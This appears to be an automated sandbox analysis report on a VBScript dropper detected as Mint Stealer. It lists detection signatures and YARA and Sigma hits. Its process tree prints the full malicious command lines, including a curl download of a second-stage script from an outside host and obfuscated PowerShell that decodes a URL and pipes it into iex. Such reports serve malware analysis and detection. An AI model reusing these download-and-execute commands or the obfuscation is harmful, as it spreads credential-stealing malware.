Edit tour
Windows
Analysis Report
67618a47ee8c5.vbs
Overview
General Information
Detection
Mint Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- wscript.exe (PID: 6540 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\67618 a47ee8c5.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 1804 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\67618a 47ee8cd.vb s https:// pko-downlo ad.kagyout h.co.ke/67 618a47ee67 a/67618a47 ee8cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 2852 cmdline:
curl -k -o C:\Users\ Public\676 18a47ee8cd .vbs https ://pko-dow nload.kagy outh.co.ke /67618a47e e67a/67618 a47ee8cd.v bs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 6456 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 7618a47ee8 cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5708 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \67618a47e e8cd.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 2988 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\b mkvfo.js MD5: A47CBE969EA935BDD3AB568BB126BC80) - conhost.exe (PID: 4852 cmdline:
conhost -- headless p owershell $nupqcmyik ef='ur' ;n ew-alias p rintout c$ ($nupqcmyi kef)l;$rhg dckzwb=(52 96,5308,53 04,5308,53 03,5310,52 91,5249,53 15,5296,52 44,5239,53 09,5304,53 05,5240,52 42,5239,53 05,5297,53 05,5256,53 08,5254,53 02,5298,53 03,5309,53 08,5243,52 42);$wcpdu kmela=('br onx','get- cmdlet');$ xpyktecohu n=$rhgdckz wb;foreach ($mtdgshwx fkuza in $ xpyktecohu n){$pqhkib c=$mtdgshw xfkuza;$iq mptoujlvgy h=$iqmptou jlvgyh+[ch ar]($pqhki bc-5193);$ tbjsczxqfh =$iqmptouj lvgyh; $wl upxmqob=$t bjsczxqfh} ;$yexnqzpi vaugw[2]=$ wlupxmqob; $xmdupkr=' rl';$ocxjq szgpw=1;.$ ([char](99 92-9887)+' e'+'x')(pr intout -us eb $wlupxm qob) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7016 cmdline:
powershell $nupqcmyi kef='ur' ; new-alias printout c $($nupqcmy ikef)l;$rh gdckzwb=(5 296,5308,5 304,5308,5 303,5310,5 291,5249,5 315,5296,5 244,5239,5 309,5304,5 305,5240,5 242,5239,5 305,5297,5 305,5256,5 308,5254,5 302,5298,5 303,5309,5 308,5243,5 242);$wcpd ukmela=('b ronx','get -cmdlet'); $xpyktecoh un=$rhgdck zwb;foreac h($mtdgshw xfkuza in $xpyktecoh un){$pqhki bc=$mtdgsh wxfkuza;$i qmptoujlvg yh=$iqmpto ujlvgyh+[c har]($pqhk ibc-5193); $tbjsczxqf h=$iqmptou jlvgyh; $w lupxmqob=$ tbjsczxqfh };$yexnqzp ivaugw[2]= $wlupxmqob ;$xmdupkr= 'rl';$ocxj qszgpw=1;. $([char](9 992-9887)+ 'e'+'x')(p rintout -u seb $wlupx mqob) MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6536 cmdline:
conhost -- headless p owershell $tiznsomry jec='ur' ; new-alias printout c $($tiznsom ryjec)l;$i kgytfezh=( 2594,2606, 2602,2606, 2601,2608, 2589,2547, 2613,2594, 2542,2537, 2607,2602, 2603,2538, 2540,2537, 2603,2595, 2603,2554, 2606,2552, 2600,2596, 2601,2607, 2606,2541, 2540);$erx bmnil=('br onx','get- cmdlet');$ nfpekqwz=$ ikgytfezh; foreach($m dovnxu in $nfpekqwz) {$oycmishn j=$mdovnxu ;$yozmvglx =$yozmvglx +[char]($o ycmishnj-2 491);$agfl ovwuqxrnek =$yozmvglx ; $ptzlyfg =$agflovwu qxrnek};$f wlxzitsjno [2]=$ptzly fg;$aphsdz mcr='rl';$ bkgejqchs= 1;.$([char ](9992-988 7)+'e'+'x' )(printout -useb $pt zlyfg) MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2144 cmdline:
powershell $tiznsomr yjec='ur' ;new-alias printout c$($tiznso mryjec)l;$ ikgytfezh= (2594,2606 ,2602,2606 ,2601,2608 ,2589,2547 ,2613,2594 ,2542,2537 ,2607,2602 ,2603,2538 ,2540,2537 ,2603,2595 ,2603,2554 ,2606,2552 ,2600,2596 ,2601,2607 ,2606,2541 ,2540);$er xbmnil=('b ronx','get -cmdlet'); $nfpekqwz= $ikgytfezh ;foreach($ mdovnxu in $nfpekqwz ){$oycmish nj=$mdovnx u;$yozmvgl x=$yozmvgl x+[char]($ oycmishnj- 2491);$agf lovwuqxrne k=$yozmvgl x; $ptzlyf g=$agflovw uqxrnek};$ fwlxzitsjn o[2]=$ptzl yfg;$aphsd zmcr='rl'; $bkgejqchs =1;.$([cha r](9992-98 87)+'e'+'x ')(printou t -useb $p tzlyfg) MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 368 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 7618a47ee8 cd.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7100 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7088 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \67618a47e e8cd.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 5916 cmdline:
"C:\Window s\System32 \wscript.e xe" //E:js cript C:\U sers\user\ AppData\Lo cal\Temp\i ethuj.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Tim Shelton: |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |